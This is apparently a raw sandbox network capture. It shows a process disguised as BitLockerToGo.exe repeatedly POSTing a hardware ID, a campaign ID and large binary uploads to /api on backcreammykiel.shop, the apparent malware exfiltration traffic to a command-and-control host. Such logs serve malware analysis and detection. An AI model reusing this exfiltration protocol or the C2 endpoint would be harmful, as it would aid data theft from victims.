2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 33 34 62 65 0d 0a 2b 58 65 34 79 33 52 72 77 6f 7a 49 42 74 51 61 62 58 52 66 44 45 4d 2b 42 2f 56 4b 2b 50 69 74 79 59 33 79 51 79 51 73 48 6c 58 45 4e 70 69 47 4e 55 2f 36 69 66 46 48 6c 52 64 73 58 57 59 41 51 32 63 36 6f 48 2f 6b 48 4c 6e 74 68 65 4a 4c 44 51 30 6d 43 4d 6e 66 75 61 64 30 59 37 75 30 79 58 76 73 47 77 78 74 62 30 67 58 42 68 66 42 61 74 79 63 6c 63 47 4a 6b 6e 38 6f 49 41 5a 35 31 47 36 49 69 6d 56 76 36 72 6e 4e 5a 38 6b 61 53 53 78 61 41 57 59 50 4f 39 30 58 35 62 57 59 34 57 6d 4b 55 2f 51 41 64 33 54 34 41 78 47 6e 64 5a 62 6e 48 4d 42 75 33 53 59 45 5a 51 34 49 75 71 63 79 79 48 2f 73 73 54 44 6f 76 4c 4e 32 4f 51 55 75 61 63 46 2f 30 61 64 39 50 38 4b 39 31 51 2b 46 42 6c 30 67 51 7a 52 76 6a 67 66 64 4c 75 6a 6f 6e 61 57 51 69 Data Ascii: 34be+Xe4y3RrwozIBtQabXRfDEM+B/VK+PityY3yQyQsHlXENpiGNU/6ifFHlRdsXWYAQ2c6oH/kHLntheJLDQ0mCMnfuad0Y7u0yXvsGwxtb0gXBhfBatyclcGJkn8oIAZ51G6IimVv6rnNZ8kaSSxaAWYPO90X5bWY4WmKU/QAd3T4AxGndZbnHMBu3SYEZQ4IuqcyyH/ssTDovLN2OQUuacF/0ad9P8K91Q+FBl0gQzRvjgfdLujonaWQi
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 61 38 63 52 53 67 4a 70 42 52 74 2b 45 61 47 37 55 45 32 52 74 5a 67 42 47 42 31 72 49 4e 39 31 31 6d 4f 69 38 73 33 59 35 44 44 34 77 38 52 2b 35 37 7a 51 47 69 2f 43 55 4a 70 53 37 5a 47 31 6d 43 43 49 2f 6d 73 68 2f 37 64 7a 30 51 4c 79 7a 64 6a 6b 46 4a 33 57 70 66 39 47 6e 4e 46 4a 2f 74 4d 42 75 31 42 4e 6b 5a 43 59 42 50 67 38 36 33 58 71 73 6e 49 6e 74 37 62 64 6a 79 50 53 69 4b 61 68 57 33 61 62 6c 64 35 71 5a 6b 56 4f 56 34 70 58 63 57 77 52 54 50 7a 4d 46 4c 74 43 55 6e 66 57 70 51 6f 63 49 45 48 35 70 79 47 61 78 72 30 54 4b 31 37 54 41 62 74 51 54 62 56 6c 75 59 56 66 6a 4f 75 42 32 47 65 30 77 36 4c 79 7a 64 6a 6b 46 4c 68 54 78 48 37 6d 75 71 57 66 6d 68 64 55 2f 6d 43 37 68 4f 44 63 6f 4d 67 36 6a 33 54 4c 41 6a 4b 57 6f 74 49 50 65 4f 51 Data Ascii: a8cRSgJpBRt+EaG7UE2RtZgBGB1rIN911mOi8s3Y5DD4w8R+57zQGi/CUJpS7ZG1mCCI/msh/7dz0QLyzdjkFJ3Wpf9GnNFJ/tMBu1BNkZCYBPg863XqsnInt7bdjyPSiKahW3abld5qZkVOV4pXcWwRTPzMFLtCUnfWpQocIEH5pyGaxr0TK17TAbtQTbVluYVfjOuB2Ge0w6LyzdjkFLhTxH7muqWfmhdU/mC7hODcoMg6j3TLAjKWotIPeOQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62540	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:40 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18170 Host: backcreammykiel.shop
2024-06-18 20:59:40 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:40 UTC	2839	OUT	Data Raw: 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2024-06-18 20:59:41 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nhq8ln6nrndaogc2c90nr36j6n; expires=Sat, 12-Oct-2024 14:46:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cyKjmxvB9EZfeDiTUSxTX%2BTky0bXopd2pGsAcWUQ45EHlO6kmVryPosOOtZTv6G43gOkPBYbq6worOSIRK3Y02lYG6mBwiwBvnqqWmt9s0zw7RcXwRo6IF9fb7W%2Bp1ugNXtMe66q8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e345d3bef43a6-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 32 0d 0a Data Ascii: fok 8.46.123.182
2024-06-18 20:59:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62541	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:42 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8791 Host: backcreammykiel.shop
2024-06-18 20:59:42 UTC	8791	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:42 UTC	818	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b6bne0nq36jar63o4oj4lklqdn; expires=Sat, 12-Oct-2024 14:46:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DMSEWc%2B%2FSmGNlYtB%2BbuNaj2a4LtezB35yCW6myqkRWZEe1P5VY%2F5JdmrMB30jY33APdr%2B%2B0nNnmidNBdo3roZeQaPw2zYKCNzpFJp4k2XlQSiE4XWV0fyfOjpuBKmG5meTB1%2BwsQ%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e346469fa4239-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 32 0d 0a Data Ascii: fok 8.46.123.182
2024-06-18 20:59:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62542	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:43 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20444 Host: backcreammykiel.shop
2024-06-18 20:59:43 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:43 UTC	5113	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 Data Ascii: `M?lrQMn 64F6(X&7~
2024-06-18 20:59:43 UTC	818	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=25b4u9qnh24p0o8dkvr1eobc11; expires=Sat, 12-Oct-2024 14:46:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9HaMUkMTpZnYq3EKMmYML6EjkZ0%2Fmeqi%2FCg64bpqLKG%2BoS36B%2F9Pao%2BfYZbD3ze0oQ%2BokeRv3gqT0269pYMFYCxmqr4Vgw%2BouJGiBfgwjvp6r2wFaOTOKA8O4GVFTVVabuSa%2B13XA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e346bbf6343d9-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 32 0d 0a Data Ascii: fok 8.46.123.182
2024-06-18 20:59:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62543	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:44 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 3801 Host: backcreammykiel.shop
2024-06-18 20:59:44 UTC	3801	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:45 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eighfs0mqm1o5cr9hqutbjsaq7; expires=Sat, 12-Oct-2024 14:46:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FMF8ELHxYxX8wd3tAFigNFPcl0oqXuu7EnVv4DOsrTeSkyXg2cuKaIXkdU0n19YPnHzRSGbI%2FnqMt48a8Yi98OR1NrqP84opiulJPieSty548WjAGpqb3n%2F4t0pL%2FRZtTUqVVrAbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e34746fa5428f-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 32 0d 0a Data Ascii: fok 8.46.123.182
2024-06-18 20:59:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62544	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:45 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1269 Host: backcreammykiel.shop
2024-06-18 20:59:45 UTC	1269	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:46 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hb81pmovi63cs0hmcoue6ungqs; expires=Sat, 12-Oct-2024 14:46:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yio9BZnl2cHiCcj1juw166PtR6I0lGnh5lFwwYG5K9EK%2FnfoeES4xtdf1eKi4uZls%2FXniRjjdMbkN0IuQYpcCmTA5YK8o2m2%2BJifqeLz99oRGsdryDC6lxntHVaNXHyAoOW0T6%2FlqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e347a99c442b1-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 32 0d 0a Data Ascii: fok 8.46.123.182
2024-06-18 20:59:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62545	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:47 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 554732 Host: backcreammykiel.shop
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 30 31 41 31 36 36 42 44 32 36 31 41 39 31 42 32 46 46 38 42 32 38 32 34 41 34 43 42 44 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B901A166BD261A91B2FF8B2824A4CBDB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@zodi
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 3c 43 19 a6 7b 9c 4a d5 4a f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 Data Ascii: <C{JJ6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{'
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 34 4b 21 e5 23 47 f2 c5 30 ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 Data Ascii: 4K!#G01!y>VrRZ'R%0Zo[TqeuJ`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/KvtQ!3K4+EVh}8%tGJ:Ky.!,.v
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 6b 03 b7 dc f7 ea d8 ed 0d 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 